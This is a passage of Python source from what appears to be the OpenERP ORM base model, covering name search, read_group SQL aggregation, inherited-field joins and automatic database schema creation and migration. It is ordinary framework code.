args: optional search domain (see :meth:`~.search` for syntax), specifying further restrictions :param str operator: domain operator for matching the ``name`` pattern, such as ``'like'`` or ``'='``. :param int limit: optional max number of records to return :rtype: list :return: list of pairs ``(id,text_repr)`` for all matching records. """ return self._name_search(cr, user, name, args, operator, context, limit) def name_create(self, cr, uid, name, context=None): """Creates a new record by calling :meth:`~.create` with only one value provided: the name of the new record (``_rec_name`` field). The new record will also be initialized with any default values applicable to this model, or provided through the context. The usual behavior of :meth:`~.create` applies. Similarly, this method may raise an exception if the model has multiple required fields and some do not have default values. :param name: name of the record to create :rtype: tuple :return: the :meth:`~.name_get` pair value for the newly-created record. """ rec_id = self.create(cr, uid, {self._rec_name: name}, context); return self.name_get(cr, uid, [rec_id], context)[0] # private implementation of name_search, allows passing a dedicated user for the name_get part to # solve some access rights issues def _name_search(self, cr, user, name='', args=None, operator='ilike', context=None, limit=100, name_get_uid=None): if args is None: args = [] if context is None: context = {} args = args[:] # optimize out the default criterion of ``ilike ''`` that matches everything if not (name == '' and operator == 'ilike'): args += [(self._rec_name, operator, name)] access_rights_uid = name_get_uid or user ids = self._search(cr, user, args, limit=limit, context=context, access_rights_uid=access_rights_uid) res = self.name_get(cr, access_rights_uid, ids, context) return res def read_string(self, cr, uid, id, langs, fields=None, context=None): res = {} res2 = {} self.pool.get('ir.translation').check_read(cr, uid) if not fields: fields = self._columns.keys() + self._inherit_fields.keys() #FIXME: collect all calls to _get_source into one SQL call. for lang in langs: res[lang] = {'code': lang} for f in fields: if f in self._columns: res_trans = self.pool.get('ir.translation')._get_source(cr, uid, self._name+','+f, 'field', lang) if res_trans: res[lang][f] = res_trans else: res[lang][f] = self._columns[f].string for table in self._inherits: cols = intersect(self._inherit_fields.keys(), fields) res2 = self.pool.get(table).read_string(cr, uid, id, langs, cols, context) for lang in res2: if lang in res: res[lang]['code'] = lang for f in res2[lang]: res[lang][f] = res2[lang][f] return res def write_string(self, cr, uid, id, langs, vals, context=None): self.pool.get('ir.translation').check_write(cr, uid) #FIXME: try to only call the translation in one SQL for lang in langs: for field in vals: if field in self._columns: src = self._columns[field].string self.pool.get('ir.translation')._set_ids(cr, uid, self._name+','+field, 'field', lang, [0], vals[field], src) for table in self._inherits: cols = intersect(self._inherit_fields.keys(), vals) if cols: self.pool.get(table).write_string(cr, uid, id, langs, vals, context) return True def _add_missing_default_values(self, cr, uid, values, context=None): missing_defaults = [] avoid_tables = [] # avoid overriding inherited values when parent is set for tables, parent_field in self._inherits.items(): if parent_field in values: avoid_tables.append(tables) for field in self._columns.keys(): if not field in values: missing_defaults.append(field) for field in self._inherit_fields.keys(): if (field not in values) and (self._inherit_fields[field][0] not in avoid_tables): missing_defaults.append(field) if len(missing_defaults): # override defaults with the provided values, never allow the other way around defaults = self.default_get(cr, uid, missing_defaults, context) for dv in defaults: if ((dv in self._columns and self._columns[dv]._type == 'many2many') \ or (dv in self._inherit_fields and self._inherit_fields[dv][2]._type == 'many2many')) \ and defaults[dv] and isinstance(defaults[dv][0], (int, long)): defaults[dv] = [(6, 0, defaults[dv])] if (dv in self._columns and self._columns[dv]._type == 'one2many' \ or (dv in self._inherit_fields and self._inherit_fields[dv][2]._type == 'one2many')) \ and isinstance(defaults[dv], (list, tuple)) and defaults[dv] and isinstance(defaults[dv][0], dict): defaults[dv] = [(0, 0, x) for x in defaults[dv]] defaults.update(values) values = defaults return values def clear_caches(self): """ Clear the caches This clears the caches associated to methods decorated with ``tools.ormcache`` or ``tools.ormcache_multi``. """ try: getattr(self, '_ormcache') self._ormcache = {} self.pool._any_cache_cleared = True except AttributeError: pass def _read_group_fill_results(self, cr, uid, domain, groupby, groupby_list, aggregated_fields, read_group_result, read_group_order=None, context=None): """Helper method for filling in empty groups for all possible values of the field being grouped by""" # self._group_by_full should map groupable fields to a method that returns # a list of all aggregated values that we want to display for this field, # in the form of a m2o-like pair (key,label). # This is useful to implement kanban views for instance, where all columns # should be displayed even if they don't contain any record. # Grab the list of all groups that should be displayed, including all present groups present_group_ids = [x[groupby][0] for x in read_group_result if x[groupby]] all_groups = self._group_by_full[groupby](self, cr, uid, present_group_ids, domain, read_group_order=read_group_order, access_rights_uid=openerp.SUPERUSER_ID, context=context) result_template = dict.fromkeys(aggregated_fields, False) result_template.update({groupby + '_count':0}) if groupby_list and len(groupby_list) > 1: result_template.update(__context={'group_by': groupby_list[1:]}) # Merge the left_side (current results as dicts) with the right_side (all # possible values as m2o pairs). Both lists are supposed to be using the # same ordering, and can be merged in one pass. result = [] known_values = {} def append_left(left_side): grouped_value = left_side[groupby] and left_side[groupby][0] if not grouped_value in known_values: result.append(left_side) known_values[grouped_value] = left_side else: count_attr = groupby + '_count' known_values[grouped_value].update({count_attr: left_side[count_attr]}) def append_right(right_side): grouped_value = right_side[0] if not grouped_value in known_values: line = dict(result_template) line.update({ groupby: right_side, '__domain': [(groupby,'=',grouped_value)] + domain, }) result.append(line) known_values[grouped_value] = line while read_group_result or all_groups: left_side = read_group_result[0] if read_group_result else None right_side = all_groups[0] if all_groups else None assert left_side is None or left_side[groupby] is False \ or isinstance(left_side[groupby], (tuple,list)), \ 'M2O-like pair expected, got %r' % left_side[groupby] assert right_side is None or isinstance(right_side, (tuple,list)), \ 'M2O-like pair expected, got %r' % right_side if left_side is None: append_right(all_groups.pop(0)) elif right_side is None: append_left(read_group_result.pop(0)) elif left_side[groupby] == right_side: append_left(read_group_result.pop(0)) all_groups.pop(0) # discard right_side elif not left_side[groupby] or not left_side[groupby][0]: # left side == "Undefined" entry, not present on right_side append_left(read_group_result.pop(0)) else: append_right(all_groups.pop(0)) return result def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False): """ Get the list of records in list view grouped by the given ``groupby`` fields :param cr: database cursor :param uid: current user id :param domain: list specifying search criteria [['field_name', 'operator', 'value'], ...] :param list fields: list of fields present in the list view specified on the object :param list groupby: fields by which the records will be grouped :param int offset: optional number of records to skip :param int limit: optional max number of records to return :param dict context: context arguments, like lang, time zone :param list orderby: optional ``order by`` specification, for overriding the natural sort ordering of the groups, see also :py:meth:`~osv.osv.osv.search` (supported only for many2one fields currently) :return: list of dictionaries(one dictionary for each record) containing: * the values of fields grouped by the fields in ``groupby`` argument * __domain: list of tuples specifying the search criteria * __context: dictionary with argument like ``groupby`` :rtype: [{'field_name_1': value, ...] :raise AccessError: * if user has no read rights on the requested object * if user tries to bypass access rules for read on the requested object """ context = context or {} self.check_read(cr, uid) if not fields: fields = self._columns.keys() query = self._where_calc(cr, uid, domain, context=context) self._apply_ir_rules(cr, uid, query, 'read', context=context) # Take care of adding join(s) if groupby is an '_inherits'ed field groupby_list = groupby qualified_groupby_field = groupby if groupby: if isinstance(groupby, list): groupby = groupby[0] qualified_groupby_field = self._inherits_join_calc(groupby, query) if groupby: assert not groupby or groupby in fields, "Fields in 'groupby' must appear in the list of fields to read (perhaps it's missing in the list view?)" groupby_def = self._columns.get(groupby) or (self._inherit_fields.get(groupby) and self._inherit_fields.get(groupby)[2]) assert groupby_def and groupby_def._classic_write, "Fields in 'groupby' must be regular database-persisted fields (no function or related fields), or function fields with store=True" # TODO it seems fields_get can be replaced by _all_columns (no need for translation) fget = self.fields_get(cr, uid, fields) flist = '' group_count = group_by = groupby if groupby: if fget.get(groupby): groupby_type = fget[groupby]['type'] if groupby_type in ('date', 'datetime'): qualified_groupby_field = "to_char(%s,'yyyy-mm')" % qualified_groupby_field flist = "%s as %s " % (qualified_groupby_field, groupby) elif groupby_type == 'boolean': qualified_groupby_field = "coalesce(%s,false)" % qualified_groupby_field flist = "%s as %s " % (qualified_groupby_field, groupby) else: flist = qualified_groupby_field else: # Don't allow arbitrary values, as this would be a SQL injection vector! raise except_orm(_('Invalid group_by'), _('Invalid group_by specification: "%s".\nA group_by specification must be a list of valid fields.')%(groupby,)) aggregated_fields = [ f for f in fields if f not in ('id', 'sequence') if fget[f]['type'] in ('integer', 'float') if (f in self._columns and getattr(self._columns[f], '_classic_write'))] for f in aggregated_fields: group_operator = fget[f].get('group_operator', 'sum') if flist: flist += ', ' qualified_field = '"%s"."%s"' % (self._table, f) flist += "%s(%s) AS %s" % (group_operator, qualified_field, f) gb = groupby and (' GROUP BY ' + qualified_groupby_field) or '' from_clause, where_clause, where_clause_params = query.get_sql() where_clause = where_clause and ' WHERE ' + where_clause limit_str = limit and ' limit %d' % limit or '' offset_str = offset and ' offset %d' % offset or '' if len(groupby_list) < 2 and context.get('group_by_no_leaf'): group_count = '_' cr.execute('SELECT min(%s.id) AS id, count(%s.id) AS %s_count' % (self._table, self._table, group_count) + (flist and ',') + flist + ' FROM ' + from_clause + where_clause + gb + limit_str + offset_str, where_clause_params) alldata = {} groupby = group_by for r in cr.dictfetchall(): for fld, val in r.items(): if val == None: r[fld] = False alldata[r['id']] = r del r['id'] order = orderby or groupby data_ids = self.search(cr, uid, [('id', 'in', alldata.keys())], order=order, context=context) # the IDs of records that have groupby field value = False or '' should be included too data_ids += set(alldata.keys()).difference(data_ids) if groupby: data = self.read(cr, uid, data_ids, [groupby], context=context) # restore order of the search as read() uses the default _order (this is only for groups, so the footprint of data should be small): data_dict = dict((d['id'], d[groupby] ) for d in data) result = [{'id': i, groupby: data_dict[i]} for i in data_ids] else: result = [{'id': i} for i in data_ids] for d in result: if groupby: d['__domain'] = [(groupby, '=', alldata[d['id']][groupby] or False)] + domain if not isinstance(groupby_list, (str, unicode)): if groupby or not context.get('group_by_no_leaf', False): d['__context'] = {'group_by': groupby_list[1:]} if groupby and groupby in fget: if d[groupby] and fget[groupby]['type'] in ('date', 'datetime'): dt = datetime.datetime.strptime(alldata[d['id']][groupby][:7], '%Y-%m') days = calendar.monthrange(dt.year, dt.month)[1] d[groupby] = datetime.datetime.strptime(d[groupby][:10], '%Y-%m-%d').strftime('%B %Y') d['__domain'] = [(groupby, '>=', alldata[d['id']][groupby] and datetime.datetime.strptime(alldata[d['id']][groupby][:7] + '-01', '%Y-%m-%d').strftime('%Y-%m-%d') or False),\ (groupby, '<=', alldata[d['id']][groupby] and datetime.datetime.strptime(alldata[d['id']][groupby][:7] + '-' + str(days), '%Y-%m-%d').strftime('%Y-%m-%d') or False)] + domain del alldata[d['id']][groupby] d.update(alldata[d['id']]) del d['id'] if groupby and groupby in self._group_by_full: result = self._read_group_fill_results(cr, uid, domain, groupby, groupby_list, aggregated_fields, result, read_group_order=order, context=context) return result def _inherits_join_add(self, current_table, parent_model_name, query): """ Add missing table SELECT and JOIN clause to ``query`` for reaching the parent table (no duplicates) :param current_table: current model object :param parent_model_name: name of the parent model for which the clauses should be added :param query: query object on which the JOIN should be added """ inherits_field = current_table._inherits[parent_model_name] parent_model = self.pool.get(parent_model_name) parent_table_name = parent_model._table quoted_parent_table_name = '"%s"' % parent_table_name if quoted_parent_table_name not in query.tables: query.tables.append(quoted_parent_table_name) query.where_clause.append('(%s.%s = %s.id)' % (current_table._table, inherits_field, parent_table_name)) def _inherits_join_calc(self, field, query): """ Adds missing table select and join clause(s) to ``query`` for reaching the field coming from an '_inherits' parent table (no duplicates). :param field: name of inherited field to reach :param query: query object on which the JOIN should be added :return: qualified name of field, to be used in SELECT clause """ current_table = self while field in current_table._inherit_fields and not field in current_table._columns: parent_model_name = current_table._inherit_fields[field][0] parent_table = self.pool.get(parent_model_name) self._inherits_join_add(current_table, parent_model_name, query) current_table = parent_table return '"%s".%s' % (current_table._table, field) def _parent_store_compute(self, cr): if not self._parent_store: return _logger.info('Computing parent left and right for table %s...', self._table) def browse_rec(root, pos=0): # TODO: set order where = self._parent_name+'='+str(root) if not root: where = self._parent_name+' IS NULL' if self._parent_order: where += ' order by '+self._parent_order cr.execute('SELECT id FROM '+self._table+' WHERE '+where) pos2 = pos + 1 for id in cr.fetchall(): pos2 = browse_rec(id[0], pos2) cr.execute('update '+self._table+' set parent_left=%s, parent_right=%s where id=%s', (pos, pos2, root)) return pos2 + 1 query = 'SELECT id FROM '+self._table+' WHERE '+self._parent_name+' IS NULL' if self._parent_order: query += ' order by ' + self._parent_order pos = 0 cr.execute(query) for (root,) in cr.fetchall(): pos = browse_rec(root, pos) return True def _update_store(self, cr, f, k): _logger.info("storing computed values of fields.function '%s'", k) ss = self._columns[k]._symbol_set update_query = 'UPDATE "%s" SET "%s"=%s WHERE id=%%s' % (self._table, k, ss[0]) cr.execute('select id from '+self._table) ids_lst = map(lambda x: x[0], cr.fetchall()) while ids_lst: iids = ids_lst[:40] ids_lst = ids_lst[40:] res = f.get(cr, self, iids, k, SUPERUSER_ID, {}) for key, val in res.items(): if f._multi: val = val[k] # if val is a many2one, just write the ID if type(val) == tuple: val = val[0] if (val<>False) or (type(val)<>bool): cr.execute(update_query, (ss[1](val), key)) def _check_selection_field_value(self, cr, uid, field, value, context=None): """Raise except_orm if value is not among the valid values for the selection field""" if self._columns[field]._type == 'reference': val_model, val_id_str = value.split(',', 1) val_id = False try: val_id = long(val_id_str) except ValueError: pass if not val_id: raise except_orm(_('ValidateError'), _('Invalid value for reference field "%s.%s" (last part must be a non-zero integer): "%s"') % (self._table, field, value)) val = val_model else: val = value if isinstance(self._columns[field].selection, (tuple, list)): if val in dict(self._columns[field].selection): return elif val in dict(self._columns[field].selection(self, cr, uid, context=context)): return raise except_orm(_('ValidateError'), _('The value "%s" for the field "%s.%s" is not in the selection') % (value, self._table, field)) def _check_removed_columns(self, cr, log=False): # iterate on the database columns to drop the NOT NULL constraints # of fields which were required but have been removed (or will be added by another module) columns = [c for c in self._columns if not (isinstance(self._columns[c], fields.function) and not self._columns[c].store)] columns += MAGIC_COLUMNS cr.execute("SELECT a.attname, a.attnotnull" " FROM pg_class c, pg_attribute a" " WHERE c.relname=%s" " AND c.oid=a.attrelid" " AND a.attisdropped=%s" " AND pg_catalog.format_type(a.atttypid, a.atttypmod) NOT IN ('cid', 'tid', 'oid', 'xid')" " AND a.attname NOT IN %s", (self._table, False, tuple(columns))), for column in cr.dictfetchall(): if log: _logger.debug("column %s is in the table %s but not in the corresponding object %s", column['attname'], self._table, self._name) if column['attnotnull']: cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" DROP NOT NULL' % (self._table, column['attname'])) _schema.debug("Table '%s': column '%s': dropped NOT NULL constraint", self._table, column['attname']) # checked version: for direct m2o starting from `self` def _m2o_add_foreign_key_checked(self, source_field, dest_model, ondelete): assert self.is_transient() or not dest_model.is_transient(), \ 'Many2One relationships from non-transient Model to TransientModel are forbidden' if self.is_transient() and not dest_model.is_transient(): # TransientModel relationships to regular Models are annoying # usually because they could block deletion due to the FKs. # So unless stated otherwise we default them to ondelete=cascade. ondelete = ondelete or 'cascade' self._foreign_keys.append((self._table, source_field, dest_model._table, ondelete or 'set null')) _schema.debug("Table '%s': added foreign key '%s' with definition=REFERENCES \"%s\" ON DELETE %s", self._table, source_field, dest_model._table, ondelete) # unchecked version: for custom cases, such as m2m relationships def _m2o_add_foreign_key_unchecked(self, source_table, source_field, dest_model, ondelete): self._foreign_keys.append((source_table, source_field, dest_model._table, ondelete or 'set null')) _schema.debug("Table '%s': added foreign key '%s' with definition=REFERENCES \"%s\" ON DELETE %s", source_table, source_field, dest_model._table, ondelete) def _drop_constraint(self, cr, source_table, constraint_name): cr.execute("ALTER TABLE %s DROP CONSTRAINT %s" % (source_table,constraint_name)) def _m2o_fix_foreign_key(self, cr, source_table, source_field, dest_model, ondelete): # Find FK constraint(s) currently established for the m2o field, # and see whether they are stale or not cr.execute("""SELECT confdeltype as ondelete_rule, conname as constraint_name, cl2.relname as foreign_table FROM pg_constraint as con, pg_class as cl1, pg_class as cl2, pg_attribute as att1, pg_attribute as att2 WHERE con.conrelid = cl1.oid AND cl1.relname = %s AND con.confrelid = cl2.oid AND array_lower(con.conkey, 1) = 1 AND con.conkey[1] = att1.attnum AND att1.attrelid = cl1.oid AND att1.attname = %s AND array_lower(con.confkey, 1) = 1 AND con.confkey[1] = att2.attnum AND att2.attrelid = cl2.oid AND att2.attname = %s AND con.contype = 'f'""", (source_table, source_field, 'id')) constraints = cr.dictfetchall() if constraints: if len(constraints) == 1: # Is it the right constraint? cons, = constraints if cons['ondelete_rule'] != POSTGRES_CONFDELTYPES.get((ondelete or 'set null').upper(), 'a')\ or cons['foreign_table'] != dest_model._table: _schema.debug("Table '%s': dropping obsolete FK constraint: '%s'", source_table, cons['constraint_name']) self._drop_constraint(cr, source_table, cons['constraint_name']) self._m2o_add_foreign_key_checked(source_field, dest_model, ondelete) # else it's all good, nothing to do! else: # Multiple FKs found for the same field, drop them all, and re-create for cons in constraints: _schema.debug("Table '%s': dropping duplicate FK constraints: '%s'", source_table, cons['constraint_name']) self._drop_constraint(cr, source_table, cons['constraint_name']) self._m2o_add_foreign_key_checked(source_field, dest_model, ondelete) def _auto_init(self, cr, context=None): """ Call _field_create and, unless _auto is False: - create the corresponding table in database for the model, - possibly add the parent columns in database, - possibly add the columns 'create_uid', 'create_date', 'write_uid', 'write_date' in database if _log_access is True (the default), - report on database columns no more existing in _columns, - remove no more existing not null constraints, - alter existing database columns to match _columns, - create database tables to match _columns, - add database indices to match _columns, - save in self._foreign_keys a list a foreign keys to create (see _auto_end). """ self._foreign_keys = [] raise_on_invalid_object_name(self._name) if context is None: context = {} store_compute = False todo_end = [] update_custom_fields = context.get('update_custom_fields', False) self._field_create(cr, context=context) create = not self._table_exist(cr) if getattr(self, '_auto', True): if create: self._create_table(cr) cr.commit() if self._parent_store: if not self._parent_columns_exist(cr): self._create_parent_columns(cr) store_compute = True # Create the create_uid, create_date, write_uid, write_date, columns if desired. if self._log_access: self._add_log_columns(cr) self._check_removed_columns(cr, log=False) # iterate on the "object columns" column_data = self._select_column_data(cr) for k, f in self._columns.iteritems(): if k in MAGIC_COLUMNS: continue # Don't update custom (also called manual) fields if f.manual and not update_custom_fields: continue if isinstance(f, fields.one2many): self._o2m_raise_on_missing_reference(cr, f) elif isinstance(f, fields.many2many): self._m2m_raise_or_create_relation(cr, f) else: res = column_data.get(k) # The field is not found as-is in database, try if it # exists with an old name. if not res and hasattr(f, 'oldname'): res = column_data.get(f.oldname) if res: cr.execute('ALTER TABLE "%s" RENAME "%s" TO "%s"' % (self._table, f.oldname, k)) res['attname'] = k column_data[k] = res _schema.debug("Table '%s': renamed column '%s' to '%s'", self._table, f.oldname, k) # The field already exists in database. Possibly # change its type, rename it, drop it or change its # constraints. if res: f_pg_type = res['typname'] f_pg_size = res['size'] f_pg_notnull = res['attnotnull'] if isinstance(f, fields.function) and not f.store and\ not getattr(f, 'nodrop', False): _logger.info('column %s (%s) in table %s removed: converted to a function !\n', k, f.string, self._table) cr.execute('ALTER TABLE "%s" DROP COLUMN "%s" CASCADE' % (self._table, k)) cr.commit() _schema.debug("Table '%s': dropped column '%s' with cascade", self._table, k) f_obj_type = None else: f_obj_type = get_pg_type(f) and get_pg_type(f)[0] if f_obj_type: ok = False casts = [ ('text', 'char', pg_varchar(f.size), '::%s' % pg_varchar(f.size)), ('varchar', 'text', 'TEXT', ''), ('int4', 'float', get_pg_type(f)[1], '::'+get_pg_type(f)[1]), ('date', 'datetime', 'TIMESTAMP', '::TIMESTAMP'), ('timestamp', 'date', 'date', '::date'), ('numeric', 'float', get_pg_type(f)[1], '::'+get_pg_type(f)[1]), ('float8', 'float', get_pg_type(f)[1], '::'+get_pg_type(f)[1]), ] if f_pg_type == 'varchar' and f._type == 'char' and f_pg_size < f.size: cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO temp_change_size' % (self._table, k)) cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, k, pg_varchar(f.size))) cr.execute('UPDATE "%s" SET "%s"=temp_change_size::%s' % (self._table, k, pg_varchar(f.size))) cr.execute('ALTER TABLE "%s" DROP COLUMN temp_change_size CASCADE' % (self._table,)) cr.commit() _schema.debug("Table '%s': column '%s' (type varchar) changed size from %s to %s", self._table, k, f_pg_size, f.size) for c in casts: if (f_pg_type==c[0]) and (f._type==c[1]): if f_pg_type != f_obj_type: ok = True cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO temp_change_size' % (self._table, k)) cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, k, c[2])) cr.execute(('UPDATE "%s" SET "%s"=temp_change_size'+c[3]) % (self._table, k)) cr.execute('ALTER TABLE "%s" DROP COLUMN temp_change_size CASCADE' % (self._table,)) cr.commit() _schema.debug("Table '%s': column '%s' changed type from %s to %s", self._table, k, c[0], c[1]) break if f_pg_type != f_obj_type: if not ok: i = 0 while True: newname = k + '_moved' + str(i) cr.execute("SELECT count(1) FROM pg_class c,pg_attribute a " \ "WHERE c.relname=%s " \ "AND a.attname=%s " \ "AND c.oid=a.attrelid ", (self._table, newname)) if not cr.fetchone()[0]: break i += 1 if f_pg_notnull: cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" DROP NOT NULL' % (self._table, k)) cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s"' % (self._table, k, newname)) cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, k, get_pg_type(f)[1])) cr.execute("COMMENT ON COLUMN %s.\"%s\" IS %%s" % (self._table, k), (f.string,)) _schema.debug("Table '%s': column '%s' has changed type (DB=%s, def=%s), data moved to column %s !", self._table, k, f_pg_type, f._type, newname) # if the field is required and hasn't got a NOT NULL constraint if f.required and f_pg_notnull == 0: # set the field to the default value if any if k in self._defaults: if callable(self._defaults[k]): default = self._defaults[k](self, cr, SUPERUSER_ID, context) else: default = self._defaults[k] if (default is not None): ss = self._columns[k]._symbol_set query = 'UPDATE "%s" SET "%s"=%s WHERE "%s" is NULL' % (self._table, k, ss[0], k) cr.execute(query, (ss[1](default),)) # add the NOT NULL constraint cr.commit() try: cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" SET NOT NULL' % (self._table, k), log_exceptions=False) cr.commit() _schema.debug("Table '%s': column '%s': added NOT NULL constraint", self._table, k) except Exception: msg = "Table '%s': unable to set a NOT NULL constraint on column '%s' !\n"\ "If you want to have it, you should update the records and execute manually:\n"\ "ALTER TABLE %s ALTER COLUMN %s SET NOT NULL" _schema.warning(msg, self._table, k, self._table, k) cr.commit() elif not f.required and f_pg_notnull == 1: cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" DROP NOT NULL' % (self._table, k)) cr.commit() _schema.debug("Table '%s': column '%s': dropped NOT NULL constraint", self._table, k) # Verify index indexname = '%s_%s_index' % (self._table, k) cr.execute("SELECT indexname FROM pg_indexes WHERE indexname = %s and tablename = %s", (indexname, self._table)) res2 = cr.dictfetchall() if not res2 and f.select: cr.execute('CREATE INDEX "%s_%s_index" ON "%s" ("%s")' % (self._table, k, self._table, k)) cr.commit() if f._type == 'text': # FIXME: for fields.text columns we should try creating GIN indexes instead (seems most suitable for an ERP context) msg = "Table '%s': Adding (b-tree) index for text column '%s'."\ "This is probably useless (does not work for fulltext search) and prevents INSERTs of long texts"\ " because there is a length limit for indexable btree values!\n"\ "Use a search view instead if you simply want to make the field searchable." _schema.warning(msg, self._table, k, f._type) if res2 and not f.select: cr.execute('DROP INDEX "%s_%s_index"' % (self._table, k)) cr.commit() msg = "Table '%s': dropping index for column '%s' of type '%s' as it is not required anymore" _schema.debug(msg, self._table, k, f._type) if isinstance(f, fields.many2one): dest_model = self.pool.get(f._obj) if dest_model._table != 'ir_actions': self._m2o_fix_foreign_key(cr, self._table, k, dest_model, f.ondelete) # The field doesn't exist in database. Create it if necessary. else: if not isinstance(f, fields.function) or f.store: # add the missing field cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, k, get_pg_type(f)[1])) cr.execute("COMMENT ON COLUMN %s.\"%s\" IS %%s" % (self._table, k), (f.string,)) _schema.debug("Table '%s': added column '%s' with definition=%s", self._table, k, get_pg_type(f)[1]) # initialize it if not create and k in self._defaults: if callable(self._defaults[k]): default = self._defaults[k](self, cr, SUPERUSER_ID, context) else: default = self._defaults[k] ss = self._columns[k]._symbol_set query = 'UPDATE "%s" SET "%s"=%s' % (self._table, k, ss[0]) cr.execute(query, (ss[1](default),)) cr.commit() _logger.debug("Table '%s': setting default value of new column %s", self._table, k) # remember the functions to call for the stored fields if isinstance(f, fields.function): order = 10 if f.store is not True: # i.e. if f.store is a dict order = f.store[f.store.keys()[0]][2] todo_end.append((order, self._update_store, (f, k))) # and add constraints if needed if isinstance(f, fields.many2one): if not self.pool.get(f._obj): raise except_orm('Programming Error', ('There is no reference available for %s') % (f._obj,)) dest_model = self.pool.get(f._obj) ref = dest_model._table # ir_actions is inherited so foreign key doesn't work on it if ref != 'ir_actions': self._m2o_add_foreign_key_checked(k, dest_model, f.ondelete) if f.select: cr.execute('CREATE INDEX "%s_%s_index" ON "%s" ("%s")' % (self._table, k, self._table, k)) if f.required: try: cr.commit() cr.execute('ALTER TABLE "%s" ALTER COLUMN "%s" SET NOT NULL' % (self._table, k), log_exceptions=False) _schema.debug("Table '%s': column '%s': added a NOT NULL constraint", self._table, k) except Exception: msg = "WARNING: unable to set column %s of table %s not null !\n"\ "Try to re-run: openerp-server --update=module\n"\ "If it doesn't work, update records and execute manually:\n"\ "ALTER TABLE %s ALTER COLUMN %s SET NOT NULL" _logger.warning(msg, k, self._table, self._table, k) cr.commit() else: cr.execute("SELECT relname FROM pg_class WHERE relkind IN ('r','v') AND relname=%s", (self._table,)) create = not bool(cr.fetchone()) cr.commit() # start a new transaction self._add_sql_constraints(cr) if create: self._execute_sql(cr) if store_compute: self._parent_store_compute(cr) cr.commit() return todo_end def _auto_end(self, cr, context=None): """ Create the foreign keys recorded by _auto_init. """ for t, k, r, d in self._foreign_keys: cr.execute('ALTER TABLE "%s" ADD FOREIGN KEY ("%s") REFERENCES "%s" ON DELETE %s' % (t, k, r, d)) cr.commit() del self._foreign_keys def _table_exist(self, cr): cr.execute("SELECT relname FROM pg_class WHERE relkind IN ('r','v') AND relname=%s", (self._table,)) return cr.rowcount def _create_table(self, cr): cr.execute('CREATE TABLE "%s" (id SERIAL NOT NULL, PRIMARY KEY(id)) WITHOUT OIDS' % (self._table,)) cr.execute(("COMMENT ON TABLE \"%s\" IS %%s" % self._table), (self._description,)) _schema.debug("Table '%s': created", self._table) def _parent_columns_exist(self, cr): cr.execute("""SELECT c.relname FROM pg_class c, pg_attribute a WHERE c.relname=%s AND a.attname=%s AND c.oid=a.attrelid """, (self._table, 'parent_left')) return cr.rowcount def _create_parent_columns(self, cr): cr.execute('ALTER TABLE "%s" ADD COLUMN "parent_left" INTEGER' % (self._table,)) cr.execute('ALTER TABLE "%s" ADD COLUMN "parent_right" INTEGER' % (self._table,)) if 'parent_left' not in self._columns: _logger.error('create a column parent_left on object %s: fields.integer(\'Left Parent\', select=1)', self._table) _schema.debug("Table '%s': added column '%s' with definition=%s", self._table, 'parent_left', 'INTEGER') elif not self._columns['parent_left'].select: _logger.error('parent_left column on object %s must be indexed! Add select=1 to the field definition)', self._table) if 'parent_right' not in self._columns: _logger.error('create a column parent_right on object %s: fields.integer(\'Right Parent\', select=1)', self._table) _schema.debug("Table '%s': added column '%s' with definition=%s", self._table, 'parent_right', 'INTEGER') elif not self._columns['parent_right'].select: _logger.error('parent_right column on object %s must be indexed! Add select=1 to the field definition)', self._table) if self._columns[self._parent_name].ondelete != 'cascade': _logger.error("The column %s on object %s must be set as ondelete='cascade'", self._parent_name, self._name) cr.commit() def _add_log_columns(self, cr): for field, field_def in LOG_ACCESS_COLUMNS.iteritems(): cr.execute(""" SELECT c.relname FROM pg_class c, pg_attribute a WHERE c.relname=%s AND a.attname=%s AND c.oid=a.attrelid """, (self._table, field)) if not cr.rowcount: cr.execute('ALTER TABLE "%s" ADD COLUMN "%s" %s' % (self._table, field, field_def)) cr.commit() _schema.debug("Table '%s': added column '%s' with definition=%s", self._table, field, field_def) def _select_column_data(self, cr): # attlen is the number of bytes necessary to represent the type when # the type has a fixed size. If the type has a varying size attlen is # -1 and atttypmod is the size limit + 4, or -1 if there is no limit. # Thus the query can return a negative size for a unlimited varchar. cr.execute("SELECT c.relname,a.attname,a.attlen,a.atttypmod,a.attnotnull,a.atthasdef,t.typname,CASE WHEN a.attlen=-1 THEN a.atttypmod-4 ELSE a.attlen END as size " \ "FROM pg_class c,pg_attribute a,pg_type t " \ "WHERE c.relname=%s " \ "AND c.oid=a.attrelid " \ "AND a.atttypid=t.oid", (self._table,)) return dict(map(lambda x: (x['attname'], x),cr.dictfetchall())) def _o2m_raise_on_missing_reference(self, cr, f): # TODO this check should be a method on fields.one2many. other = self.pool.get(f._obj) if other: # TODO the condition could use fields_get_keys(). if f._fields_id not in other._columns.keys(): if f._fields_id not in other._inherit_fields.keys(): raise except_orm('Programming Error', ("There is no reference field '%s' found for '%s'") % (f._fields_id, f._obj,)) def _m2m_raise_or_create_relation(self, cr, f): m2m_tbl, col1, col2 = f._sql_names(self) cr.execute("SELECT relname FROM pg_class WHERE relkind IN ('r','v') AND relname=%s", (m2m_tbl,)) if not cr.dictfetchall(): if not self.pool.get(f._obj): raise except_orm('Programming Error', ('Many2Many destination model does not exist: `%s`') % (f._obj,)) dest_model = self.pool.get(f._obj) ref = dest_model._table cr.execute('CREATE TABLE "%s" ("%s" INTEGER NOT NULL, "%s" INTEGER NOT NULL, UNIQUE("%s","%s")) WITH OIDS' % (m2m_tbl, col1, col2, col1, col2)) # create foreign key references with ondelete=cascade, unless the targets are SQL views cr.execute("SELECT relkind FROM pg_class WHERE relkind IN ('v') AND relname=%s", (ref,)) if not cr.fetchall(): self._m2o_add_foreign_key_unchecked(m2m_tbl, col2, dest_model, 'cascade') cr.execute("SELECT relkind FROM pg_class WHERE relkind IN ('v') AND relname=%s", (self._table,)) if not cr.fetchall(): 